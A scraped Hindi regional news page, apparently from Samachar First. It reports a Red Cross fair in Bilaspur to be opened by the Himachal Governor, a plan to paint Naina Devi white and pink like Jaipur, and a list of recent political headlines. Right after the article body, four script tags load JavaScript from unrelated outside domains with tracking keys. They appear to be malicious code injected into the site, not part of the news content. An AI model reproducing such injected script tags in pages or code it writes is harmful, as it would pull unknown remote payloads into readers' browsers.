Categories: हिमाचल

बिलासपुर में दो दिवसीय रेडक्रॉस मेले का शुभारंभ करेंगे राज्यपालः राजेश्वर गोयल

<p>बिलासपुर में आयोजित किए जा रहे जिलास्तरीय रेडक्रॉस मेला का आयोजन किया जाएगा। इसमें विभिन्न एक्टिविटीज के आयोजन को लेकर शेड्यूल तैयार कर लिया गया है। यह आयोजन नगर परिषद ग्राउंड में 14 और 15 दिसंबर को होगा। जिसका शुभारंभ 14 दिसंबर को सुबह साढ़े दस बजे प्रदेश के महामहिम राज्यपाल बंडारू दत्तात्रेय करेंगे। इस बारे में उपायुक्त बिलासपुर राजेश्वर गोयल ने बताया कि साल 2016 में रेडक्रॉस मेले का आयोजन हुआ था और अब तीन साल बाद आयोजन हो रहा है। जिसे भव्य एवं आकर्षक बनाने के लिए इस बार प्रशासन की तरफ से कई नए प्रयास किए गए हैं। रेडक्रॉस मेले में सांस्कृतिक कार्यक्रमों का आयोजन भी किया जाएगा। इसके साथ ही चार सौ से ज्यादा लोगों को कृत्रिम अंग वितरित करने का लक्ष्य तय किया गया है। साथ ही रेड्क्रॉस मेले में 100 और 50 बार रक्त दान कर चुके रक्तदाता भी सम्मानित किए जाएंगे</p>

<p>वहीं, उपायुक्त ने बताया कि नैना देवी ट्रस्ट को लेकर बताया कि उत्तर भारत के सुप्रसिद्ध शक्तिपीठ नयनादेवी को अब जयपुर की तर्ज पर पिंक सिटी बनाया जाएगा। आमजन और ट्रस्टियों के सुझावों पर अमल करते हुए जिला प्रशासन ने योजना पर काम शुरू कर दिया है। मां नयना के मंदिर संग पूरे एरिया के मकानों को व्हाईट के साथ पिंक कलरयुक्त किया जाएगा। पूरे एरिया को सोलर लाईटों से लैस किया जाएगा जिससे रात के समय दूर-दूर से नयनादेवी दूधिया रोशनी में नहाया हुआ प्रतीत होगा। मंदिर की व्यवस्था के लिए न्यास प्रशासन की ओर से आधा दर्जन कमेटियां बनाई गई हैं जिनमें ट्रस्टियों को भी भागीदार बनाया गया है।</p>

<p>उन्होंने बताया कि हालांकि पहले नयनादेवी को व्हाईट सिटी बनाने की योजना थी। लेकिन लोगों की ओर से इस बाबत सुझाए आए हैं कि व्हाईट कम पिंक किया जाए क्योंकि व्हाईट कलर कुछ समय के बाद खराब हो जाता है जिस कारण हर साल मकानों में कलर करवाना संभव नहीं होगा। इस पर अब निर्णय लिया गया है कि जयपुर की तर्ज पर नयनादेवी को व्हाईट एंड पिंक सिटी बनाया जाएगा। इसके लिए कार्रवाई जारी है और जल्द ही इस बाबत आमजन से समन्वय बनाया जाएगा</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576214363407″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

पुराने साथियों की घर वापसी से कांग्रेस संगठन हो रहा मजबूत

शिमला जिला के कुमारसैन वार्ड के जिला परिषद सदस्य उज्वल मेहता आज प्रदेश कांग्रेस मुख्यालय…

4 hours ago

“भाजपा कांग्रेस के घोषणा पत्र को लेकर भ्रामक प्रचार कर रही”

लोकसभा चुनाव में कांग्रेस घोषणा पत्र को लेकर जहां भाजपा बार-बार हिंदुत्व विरोधी और बहुसंख्यक…

4 hours ago

राष्ट्रपति द्रौपदी मुर्मू का आज शिमला पहुंचने पर स्वागत

राष्ट्रपति द्रौपदी मुर्मु का आज शिमला पहुंचने पर मशोबरा स्थित कल्याणी हेलीपैड पर राज्यपाल शिव…

5 hours ago

बागवान भोपाल ने तकनीक के इस्तेमाल से किसानी को बनाया मुनाफे का सौदा

वर्तमान में किसनी और बागवानी में भी आधुनिकीकरण का प्रभाव देखने को मिल रहा है.…

5 hours ago

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी -गद्दी नेता कपूर बीते…

6 hours ago

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध: बिंदल

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध, कांग्रेस नेता कर रहे…

8 hours ago